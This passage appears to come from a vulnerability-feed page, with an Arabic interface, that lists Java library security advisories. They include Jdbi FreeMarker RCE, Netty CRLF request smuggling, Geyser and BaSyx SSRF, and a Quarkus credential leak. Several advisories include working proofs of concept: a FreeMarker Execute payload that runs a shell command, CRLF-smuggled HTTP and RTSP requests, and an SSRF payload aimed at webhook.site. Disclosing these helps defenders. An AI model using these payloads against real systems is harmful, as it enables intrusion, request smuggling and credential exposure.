Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS); c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/")); c.setNumberFormat("computer"); CONFIGURATION = c; } ``` The locator's `CONFIGURATION` is initialized once at class load and used by the deprecated static `findTemplate(Class, String)`. It cannot be replaced via `FreemarkerConfig#setFreemarkerConfiguration(...)`, so any fix must land in both call sites. The sink is `FreemarkerEngine.parse()`, which constructs a `Template` from the raw SQL string and renders it against `ctx.getAttributes()`: ```java // freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerEngine.java Template template = new Template(null, sqlTemplate, config.get(FreemarkerConfig.class).getFreemarkerConfiguration()); return Optional.of(ctx -> { StringWriter writer = new StringWriter(); template.process(ctx.getAttributes(), writer); return writer.toString(); }); ``` Freemarker is the only built-in engine whose parse path provides reflective class loading by default. ## Impact This impacts all `jdbi3-freemarker` releases through 3.52.1. Exploitation requires that an application depend on `jdbi3-freemarker`and allow request-derived text to flow into a SQL template body passed to `Handle.createQuery(String)`, `createUpdate(String)`, `createCall(String)`, `createScript(String)`, or `Batch.add(String)`, or into a defined attribute that the template subsequently re-evaluates with `?eval` or `?interpret`. An application that allows attacker-influenced text to become FreeMarker template source, either directly through a SQL string passed to Jdbi or indirectly through a trusted template that applies `?eval` / `?interpret` to an attacker-influenced defined attribute, can become an RCE sink in the application JVM. ## Proposed Patch The injection surface is the `Configuration` constructed by Jdbi on the application's behalf without a class-resolver policy. `FreemarkerConfig` and `FreemarkerSqlLocator`'s static initializer should not allow SQL templates to instantiate arbitrary Java classes by default. Callers that genuinely need reflective `?new` can override the `Configuration` via `FreemarkerConfig#setFreemarkerConfiguration(...)`. The static `CONFIGURATION` field cannot be reconfigured by application code at runtime, so a fix limited to `FreemarkerConfig` leaves the legacy locator path exploitable. ```java import freemarker.core.TemplateClassResolver; // FreemarkerConfig.java public FreemarkerConfig() { freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS); freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/")); freemarkerConfiguration.setNumberFormat("computer"); freemarkerConfiguration.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER); } // FreemarkerSqlLocator.java static { Configuration c = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS); c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/")); c.setNumberFormat("computer"); c.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER); CONFIGURATION = c; } ``` `ALLOWS_NOTHING_RESOLVER` rejects every `?new` lookup, which is sufficient for SQL templating.`SAFER_RESOLVER` also closes RCE and blocks only `Execute`, `ObjectConstructor`, and `JythonRuntime`, none of which a SQL template would ever need. A complete hardening also restricts the template loader to a non-root prefix. ## Proof of Concept This PoC uses direct string concatenation to simulate an application passing un-sanitized, request-derived text to the SQL template engine. The same RCE payload works if the attacker input is passed through a Jdbi `@Define` attribute that the template subsequently evaluates. ```bash # Create project directory mkdir jdbi-freemarker-poc && cd jdbi-freemarker-poc cat > pom.xml << 'EOF' <project xmlns="http://maven.apache.org/POM/4.0.0"> <modelVersion>4.0.0</modelVersion> <groupId>poc</groupId> <artifactId>jdbi-freemarker-poc</artifactId> <version>1.0</version> <properties> <maven.compiler.release>17</maven.compiler.release> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> </properties> <dependencies> <dependency> <groupId>org.jdbi</groupId> <artifactId>jdbi3-core</artifactId> <version>3.52.1</version> </dependency> <dependency> <groupId>org.jdbi</groupId> <artifactId>jdbi3-freemarker</artifactId> <version>3.52.1</version> </dependency> <dependency> <groupId>com.h2database</groupId> <artifactId>h2</artifactId> <version>2.2.224</version> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <version>3.13.0</version> </plugin> </plugins> </build> </project> EOF mkdir -p src/main/java cat > src/main/java/Server.java << 'EOF' import com.sun.net.httpserver.HttpServer; import org.jdbi.v3.core.Jdbi; import org.jdbi.v3.core.statement.SqlStatements; import org.jdbi.v3.freemarker.FreemarkerEngine; import java.net.InetSocketAddress; import java.net.URLDecoder; import java.nio.charset.StandardCharsets; import java.util.HashMap; import java.util.Map; public class Server { public static void main(String[] args) throws Exception { Jdbi jdbi = Jdbi.create("jdbc:h2:mem:poc;DB_CLOSE_DELAY=-1"); jdbi.getConfig(SqlStatements.class) .setTemplateEngine(FreemarkerEngine.instance()); jdbi.useHandle(h -> { h.execute("create table users (id int, email varchar)"); h.execute("insert into users values (1,'alice@example.com'),(2,'bob@example.com')"); }); HttpServer http = HttpServer.create(new InetSocketAddress(8050), 0); http.createContext("/search", ex -> { String q = parseQuery(ex.getRequestURI().getRawQuery()).getOrDefault("q", ""); String sql = "select email from users where email like '%" + q + "%'"; String body; try { body = jdbi.withHandle(h -> h.createQuery(sql).mapTo(String.class).list().toString()); } catch (Exception e) { body = "error: " + e.getMessage(); } byte[] bytes = body.getBytes(StandardCharsets.UTF_8); ex.sendResponseHeaders(200, bytes.length); ex.getResponseBody().write(bytes); ex.close(); }); http.start(); System.out.println("listening on http://127.0.0.1:8050/search?q=..."); } private static Map<String, String> parseQuery(String raw) { Map<String, String> out = new HashMap<>(); if (raw == null) return out; for (String pair : raw.split("&")) { int eq = pair.indexOf('='); if (eq < 0) continue; out.put(URLDecoder.decode(pair.substring(0, eq), StandardCharsets.UTF_8), URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8)); } return out; } } EOF mvn -q package java -cp "target/classes:$(mvn -q dependency:build-classpath -Dmdep.outputFile=/dev/stdout)" Server & ``` Benign Request ```bash $ curl -s 'http://127.0.0.1:8050/search?q=alice' [alice@example.com] ``` Exploit ```bash $ curl -sG 'http://127.0.0.1:8050/search' \ --data-urlencode 'q=<#assign ex="freemarker.template.utility.Execute"?new()>${ex("touch /tmp/jdbi-pwned")}' [alice@example.com, bob@example.com] $ ls -la /tmp/jdbi-pwned -rw-r--r-- 1 wodzen wodzen 0 Apr 27 02:21 /tmp/jdbi-pwned ```

الإصدارات المتأثرة

3.10.0, 3.10.0-rc1, 3.10.1, 3.11.0, 3.11.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

منخفضة
📦 org.geysermc.geyser:core 📌 All versions < 2.9.3 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ SSRF 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET req...
📅 2026-05-05 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client. ### Details Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure. When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated. ### PoC 1. **Setup Environment:** - Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed. - Ensure you have a Bedrock client connected. 2. **Prepare Listener:** - Go to [webhook.site](https://webhook.site) and obtain a unique URL (e.g., `https://webhook.site/YOUR-UUID`). 3. **Construct Payload:** - Create a JSON payload pointing to your listener URL: `{"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}` - Encode this JSON string to Base64. *(You can use a terminal command: `echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64`)* 4. **Execute Command:** - Run the following command in the Bedrock Edition client: `/give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]` 5. **Verify:** - Check the webhook.site dashboard. - You will see an **HTTP GET request originating from the Minecraft Server's IP address**, not the client's IP. ### Impact This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints. #### Affected Parties - Minecraft servers running Geyser - Server operators exposing internal or cloud metadata endpoints #### Potential Impacts - Internal network probing (e.g., intranet services, admin panels) - Cloud metadata access attempts (e.g., 169.254.169.254) - IP address disclosure of the Minecraft server - Abuse of the server as an HTTP request proxy Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for: - Network mapping - Firewall bypass attempts - Cloud environment fingerprinting

الإصدارات المتأثرة

All versions < 2.9.3

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

غير محدد
📦 io.netty:netty-codec-http 🏢 netty 📌 4.0.0.Alpha1, 4.0.0.Alpha2, 4.0.0.Alpha3, 4.0.0.Alpha4, 4.0.0.Alpha5 🎬 وسائط ☕ مكتبة Java Maven ⚡ CWE-93 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setU...
📅 2026-05-05 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests. In practice, this leads to HTTP request smuggling / desynchronization on the HTTP side and request injection on the RTSP side. ### Details The root issue is that URI validation exists only on the constructor path, but not on the public setter path. - `io.netty.handler.codec.http.DefaultHttpRequest` - The constructor calls `HttpUtil.validateRequestLineTokens(method, uri)` - `setUri(String uri)` only performs `checkNotNull` and does not validate - `io.netty.handler.codec.http.DefaultFullHttpRequest` - `setUri(String uri)` delegates to the parent implementation - `io.netty.handler.codec.http.HttpRequestEncoder` - Writes `request.uri()` directly into the request line - `io.netty.handler.codec.rtsp.RtspEncoder` - Writes `request.uri()` directly into the request line This creates the following bypass: 1. An application creates a `DefaultHttpRequest` or `DefaultFullHttpRequest` with a safe URI 2. Later, attacker-influenced input is passed into `setUri()` 3. `HttpRequestEncoder` or `RtspEncoder` encodes that value verbatim 4. The downstream server, proxy, or RTSP peer interprets the injected bytes after CRLF as separate requests This appears to be an incomplete fix pattern where start-line validation exists, but can still be bypassed through a mutable public API. ### PoC (HTTP) The following code first creates a normal request object and then injects a malicious request line using `setUri()`. ```java import io.netty.buffer.ByteBuf; import io.netty.channel.embedded.EmbeddedChannel; import io.netty.handler.codec.http.DefaultHttpRequest; import io.netty.handler.codec.http.HttpMethod; import io.netty.handler.codec.http.HttpRequestEncoder; import io.netty.handler.codec.http.HttpServerCodec; import io.netty.handler.codec.http.HttpVersion; import io.netty.util.CharsetUtil; public final class HttpSetUriSmugglePoc { public static void main(String[] args) { EmbeddedChannel client = new EmbeddedChannel(new HttpRequestEncoder()); EmbeddedChannel server = new EmbeddedChannel(new HttpServerCodec()); DefaultHttpRequest request = new DefaultHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.GET, "/safe"); request.setUri("/s1 HTTP/1.1\r\n" + "\r\n" + "POST /s2 HTTP/1.1\r\n" + "content-length: 11\r\n\r\n" + "Hello World" + "GET /s1"); client.writeOutbound(request); ByteBuf outbound = client.readOutbound(); System.out.println("=== Raw encoded request ==="); System.out.println(outbound.toString(CharsetUtil.US_ASCII)); System.out.println("=== Decoded by HttpServerCodec ==="); server.writeInbound(outbound.retainedDuplicate()); Object msg; while ((msg = server.readInbound()) != null) { System.out.println(msg); } outbound.release(); client.finishAndReleaseAll(); server.finishAndReleaseAll(); } } ``` When reproduced, the raw encoded request looks like this: ```http GET /s1 HTTP/1.1 POST /s2 HTTP/1.1 content-length: 11 Hello WorldGET /s1 HTTP/1.1 ``` `HttpServerCodec` then parses this as multiple HTTP messages rather than a single request: - `GET /s1` - `POST /s2` with body `Hello World` - trailing `GET /s1` This confirms that the value supplied through `setUri()` is interpreted on the wire as additional requests. ### PoC (RTSP) The same root cause also affects `RtspEncoder`. A minimal reproduction is shown below. ```java import io.netty.buffer.ByteBuf; import io.netty.channel.embedded.EmbeddedChannel; import io.netty.handler.codec.http.DefaultHttpRequest; import io.netty.handler.codec.rtsp.RtspDecoder; import io.netty.handler.codec.rtsp.RtspEncoder; import io.netty.handler.codec.rtsp.RtspMethods; import io.netty.handler.codec.rtsp.RtspVersions; import io.netty.util.CharsetUtil; public final class RtspSetUriSmugglePoc { public static void main(String[] args) { EmbeddedChannel client = new EmbeddedChannel(new RtspEncoder()); EmbeddedChannel server = new EmbeddedChannel(new RtspDecoder()); DefaultHttpRequest request = new DefaultHttpRequest( RtspVersions.RTSP_1_0, RtspMethods.OPTIONS, "rtsp://safe/media"); request.setUri("rtsp://cam/stream RTSP/1.0\r\n" + "CSeq: 1\r\n\r\n" + "DESCRIBE rtsp://cam/secret RTSP/1.0\r\n" + "CSeq: 2\r\n\r\n" + "OPTIONS rtsp://cam/final"); client.writeOutbound(request); ByteBuf outbound = client.readOutbound(); System.out.println("=== Raw encoded RTSP request ==="); System.out.println(outbound.toString(CharsetUtil.US_ASCII)); System.out.println("=== Decoded by RtspDecoder ==="); server.writeInbound(outbound.retainedDuplicate()); } } ``` When reproduced, `RtspEncoder` generates consecutive RTSP requests in a single encoded payload: ```text OPTIONS rtsp://cam/stream RTSP/1.0 CSeq: 1 DESCRIBE rtsp://cam/secret RTSP/1.0 CSeq: 2 OPTIONS rtsp://cam/final RTSP/1.0 ``` `RtspDecoder` then parses this as three separate RTSP requests: - `OPTIONS rtsp://cam/stream` - `DESCRIBE rtsp://cam/secret` - `OPTIONS rtsp://cam/final` This confirms that the same setter bypass is exploitable for RTSP request injection as well. ### Impact The vulnerable conditions are: - The application uses `DefaultHttpRequest` or `DefaultFullHttpRequest` - The request object is created first and later modified through `setUri()` - The value passed into `setUri()` is attacker-controlled or attacker-influenced - The object is eventually serialized by `HttpRequestEncoder` or `RtspEncoder` Under those conditions, an attacker may be able to: - perform HTTP request smuggling - trigger proxy/backend desynchronization - inject additional requests toward internal APIs - confuse request boundaries and bypass assumptions around authentication or routing - inject RTSP requests The exact impact depends on how the application constructs URIs and how the upstream/downstream HTTP or RTSP components parse request boundaries, but the security impact is real and reproducible. ### Root Cause Validation is enforced only at object construction time, but not on the public mutation API that can break the same security invariant. As a result, the constructors are safe while the public `setUri()` path is not, and the encoders trust and serialize the mutated value without revalidation. ### Suggested Fix Direction `DefaultHttpRequest.setUri()` and all delegating/inheriting paths should apply the same request-line token validation as the constructors. Recommended regression coverage: - verify that `setUri()` rejects CRLF-containing input after object construction - verify that `DefaultFullHttpRequest.setUri()` is blocked as well - verify that spaces, `\r`, `\n`, and request-smuggling payloads are rejected - verify that both `HttpRequestEncoder` and `RtspEncoder` are protected from setter-based bypasses ### Affected Area - `netty-codec-http` - `io.netty.handler.codec.http.DefaultHttpRequest` - `io.netty.handler.codec.http.DefaultFullHttpRequest` - `io.netty.handler.codec.http.HttpRequestEncoder` - `io.netty.handler.codec.rtsp.RtspEncoder`

الإصدارات المتأثرة

4.0.0.Alpha1, 4.0.0.Alpha2, 4.0.0.Alpha3, 4.0.0.Alpha4, 4.0.0.Alpha5

نوع الثغرة

CWE-93 — CWE-93

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

8.6/10 عالية
📦 org.eclipse.basyx:basyx.sdk 📌 1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0 🌐 متصفح ☕ مكتبة Java Maven ⚡ SSRF 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POS...
📅 2026-05-05 NVD 🔗 التفاصيل

الوصف الكامل

In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POST requests to arbitrary internal or external targets. This allows an attacker to bypass network segmentation and pivot into isolated internal IT/OT infrastructure or target Cloud Metadata services (IMDS).

الإصدارات المتأثرة

1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

10/10 حرجة
📦 org.eclipse.basyx:basyx.sdk 📌 1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0 🌐 متصفح ☕ مكتبة Java Maven ⚡ Path Traversal 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload o...
📅 2026-05-05 NVD 🔗 التفاصيل

الوصف الكامل

In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload operation, an attacker can bypass intended storage boundaries and write arbitrary files to any location on the host filesystem accessible by the Java process. This can lead to Remote Code Execution (RCE) and complete system compromise.

الإصدارات المتأثرة

1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

7.3/10 عالية
📦 thrift 🏢 apache 📌 All versions < 0.23.0 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ CWE-297 🎯 عن بعد ⚪ لم تُستغل
💬 Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.
📅 2026-05-05 NVD 🔗 التفاصيل

الوصف الكامل

Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.

الإصدارات المتأثرة

All versions < 0.23.0

نوع الثغرة

CWE-297 — CWE-297

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

غير محدد
📦 io.quarkiverse.openapi.generator:quarkus-openapi-generator 📌 All versions < 0.1.0, 0.10.0, 0.11.0, 0.12.0, 0.2.0 🌐 متصفح ☕ مكتبة Java Maven ⚡ Info Disclosure 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary The generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resemble...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary The generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints. ### Details The runtime authentication layer selects credentials by comparing the outgoing request path and method against the set of protected OpenAPI operations. Path-template matching treats `{param}` placeholders as `.*`, which incorrectly allows a single path parameter to consume `/`. As a result, a protected path such as `/repos/{ref}` also matches `/repos/foo/bar`, even though `/repos/{owner}/{repo}` is a different operation. When a client invokes the unprotected operation, the authentication filter still concludes that the protected operation matched and attaches its credentials. This affects authentication providers that rely on the shared path-matching logic, including bearer, OAuth, API-key, and basic authentication. The issue is reachable through normal generated-client usage and does not require modifying generated code. ### PoC ```bash mkdir -p /tmp/qoag-poc/src/main/java/org/acme mkdir -p /tmp/qoag-poc/src/main/resources mkdir -p /tmp/qoag-poc/src/main/openapi cat > /tmp/qoag-poc/pom.xml <<'EOF' <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>org.acme</groupId> <artifactId>qoag-poc</artifactId> <version>1.0.0</version> <properties> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <maven.compiler.release>17</maven.compiler.release> <quarkus.platform.group-id>io.quarkus</quarkus.platform.group-id> <quarkus.platform.artifact-id>quarkus-bom</quarkus.platform.artifact-id> <quarkus.platform.version>3.34.3</quarkus.platform.version> <qoag.version>2.16.0</qoag.version> </properties> <dependencyManagement> <dependencies> <dependency> <groupId>${quarkus.platform.group-id}</groupId> <artifactId>${quarkus.platform.artifact-id}</artifactId> <version>${quarkus.platform.version}</version> <type>pom</type> <scope>import</scope> </dependency> </dependencies> </dependencyManagement> <dependencies> <dependency> <groupId>io.quarkiverse.openapi.generator</groupId> <artifactId>quarkus-openapi-generator</artifactId> <version>${qoag.version}</version> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-rest</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-rest-client-jackson</artifactId> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>io.quarkus</groupId> <artifactId>quarkus-maven-plugin</artifactId> <version>${quarkus.platform.version}</version> <extensions>true</extensions> <executions> <execution> <goals> <goal>build</goal> <goal>generate-code</goal> <goal>generate-code-tests</goal> </goals> </execution> </executions> </plugin> <plugin> <artifactId>maven-compiler-plugin</artifactId> <version>3.14.0</version> <configuration> <parameters>true</parameters> </configuration> </plugin> </plugins> </build> </project> EOF cat > /tmp/qoag-poc/src/main/openapi/repro.yaml <<'EOF' openapi: 3.0.3 info: title: repro version: 1.0.0 paths: /repos/{ref}: get: operationId: getRef parameters: - in: path name: ref required: true schema: type: string security: - bearerAuth: [] responses: "200": description: ok content: text/plain: schema: type: string /repos/{owner}/{repo}: get: operationId: getOwnerRepo parameters: - in: path name: owner required: true schema: type: string - in: path name: repo required: true schema: type: string responses: "200": description: ok content: text/plain: schema: type: string components: securitySchemes: bearerAuth: type: http scheme: bearer EOF cat > /tmp/qoag-poc/src/main/resources/application.properties <<'EOF' quarkus.http.port=8081 quarkus.openapi-generator.codegen.default-security-scheme=bearerAuth quarkus.openapi-generator.codegen.spec.repro_yaml.base-package=org.acme.repro quarkus.rest-client.repro_yaml.url=http://127.0.0.1:18080 quarkus.openapi-generator.repro_yaml.auth.bearerAuth.bearer-token=SECRET EOF cat > /tmp/qoag-poc/src/main/java/org/acme/TriggerResource.java <<'EOF' package org.acme; import jakarta.ws.rs.GET; import jakarta.ws.rs.Path; import jakarta.ws.rs.Produces; import jakarta.ws.rs.core.MediaType; import org.eclipse.microprofile.rest.client.inject.RestClient; @Path("/trigger") public class TriggerResource { @RestClient org.acme.repro.api.DefaultApi api; @GET @Produces(MediaType.TEXT_PLAIN) public String trigger() { api.getOwnerRepo("foo", "bar"); return "done"; } } EOF python - <<'PY' & from http.server import BaseHTTPRequestHandler, HTTPServer class H(BaseHTTPRequestHandler): def do_GET(self): print("PATH=" + self.path, flush=True) print("AUTH=" + str(self.headers.get("Authorization")), flush=True) self.send_response(200) self.end_headers() self.wfile.write(b"ok") def log_message(self, fmt, *args): pass HTTPServer(("127.0.0.1", 18080), H).serve_forever() PY cd /tmp/qoag-poc mvn -q package -DskipTests java -jar target/quarkus-app/quarkus-run.jar & sleep 8 curl -s http://127.0.0.1:8081/trigger # PATH=/repos/foo/bar # AUTH=Bearer SECRET ``` ### Impact Clients generated from an OpenAPI specification can send authentication credentials to endpoints that were not intended to receive them. In practice, this can disclose bearer tokens, API keys, or basic credentials to lower-trust routes on the same service, cause public operations to be invoked with privileged credentials, and blur the intended security boundary between protected and unprotected operations.

الإصدارات المتأثرة

All versions < 0.1.0, 0.10.0, 0.11.0, 0.12.0, 0.2.0

نوع الثغرة

CWE-200 — Info Disclosure

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

حرجة
📦 org.thymeleaf:thymeleaf 📌 1.0.0, 1.0.0-beta1, 1.0.0-beta2, 1.0.0-beta3, 1.0.0-beta4 🗄️ سيرفر ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact A security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) c...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Impact A security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI). ### Patches This has been fixed in Thymeleaf 3.1.5.RELEASE. All users are advised to upgrade immediately. ### Workarounds No workaround is available beyond ensuring applications do not pass unvalidated/unsanitized data directly to the template engine. Upgrading to 3.1.5.RELEASE is strongly recommended in any case.

الإصدارات المتأثرة

1.0.0, 1.0.0-beta1, 1.0.0-beta2, 1.0.0-beta3, 1.0.0-beta4

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

حرجة
📦 org.openmrs.api:openmrs-api 📌 2.7.0 → 2.7.9 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact The `ConceptReferenceRangeUtility.evaluateCriteria()` method in OpenMRS Core evaluates database-stored criteria strings as Apache Velocity templates without any sandbox configuration. The `VelocityEngine` is initialized with only logging properties and no`SecureUbersp...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Impact The `ConceptReferenceRangeUtility.evaluateCriteria()` method in OpenMRS Core evaluates database-stored criteria strings as Apache Velocity templates without any sandbox configuration. The `VelocityEngine` is initialized with only logging properties and no`SecureUberspector`, leaving the default `UberspectImpl` in place, which allows unrestricted Java reflection through template expressions. A user with the `Manage Concepts` privilege can store a malicious Velocity template expression in a concept's reference range criteria field. This payload is then executed automatically whenever a user or API call validates an observation against the affected concept. The Velocity context exposes `$patient` (the `Person` / `Patient` object), `$obs` (the `Obs` object), and `$fn` (the `ConceptReferenceRangeUtility` instance with access to the full OpenMRS service layer). **Persistent Remote Code Execution**: The payload persists in the concept_reference_range database table (VARCHAR 65535). A single compromised concept for a common clinical measurement executes the payload on every subsequent observation validation across all users, API clients, and integrations in the facility. **Privilege Escalation**: The Manage Concepts privilege is a content-management function, defined as "Able to add/edit/delete concept entries", not an administrative privilege. Multiple non-admin staff per facility typically hold this privilege. The attacker escalates from concept dictionary management to arbitrary code execution as the Tomcat application server process. **PHI Exfiltration**: The Velocity context objects directly expose patient data without requiring OS-level RCE. ### Patches This is fixed in 2.8.6 and 2.7.9 as well as future versions. ### Workarounds Ensure the `Manage Concepts` privilege is restricted to only authorized users and carefully audit any `ConceptReferenceRanges` in the database. ### Resources https://github.com/openmrs/openmrs-core/commit/8d1c193 https://www.machinespirits.com/advisory/1e8430/

الإصدارات المتأثرة

2.7.0 → 2.7.9

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

4.4/10 متوسطة
📦 org.xwiki.contrib.plantuml:macro-plantuml-macro ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ SSRF 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact The [PlantUML Macro](https://extensions.xwiki.org/xwiki/bin/view/Extension/PlantUML+Macro) is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the `server` parameter. However, the application does n...
📅 2026-05-04 NVD 🔗 التفاصيل

الوصف الكامل

### Impact The [PlantUML Macro](https://extensions.xwiki.org/xwiki/bin/view/Extension/PlantUML+Macro) is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the `server` parameter. However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram. This issue affects all versions of the Plant UML Macro extension till version 2.4 included. ### Patches Version 2.4.1 of the Plant UML Macro extension fixes the issue by verifying if the supplied server domain matches one of the [trusted domain configured inside of XWiki](https://www.xwiki.org/xwiki/bin/view/Documentation/AdminGuide/Configuration/#HTrusteddomains). ### Workarounds Protect the XWiki server by placing it in a DMZ so that it cannot access any other internal servers. ### Resources The issue was fixed in [PLANTUML-25](https://jira.xwiki.org/browse/PLANTUML-25) by the commit 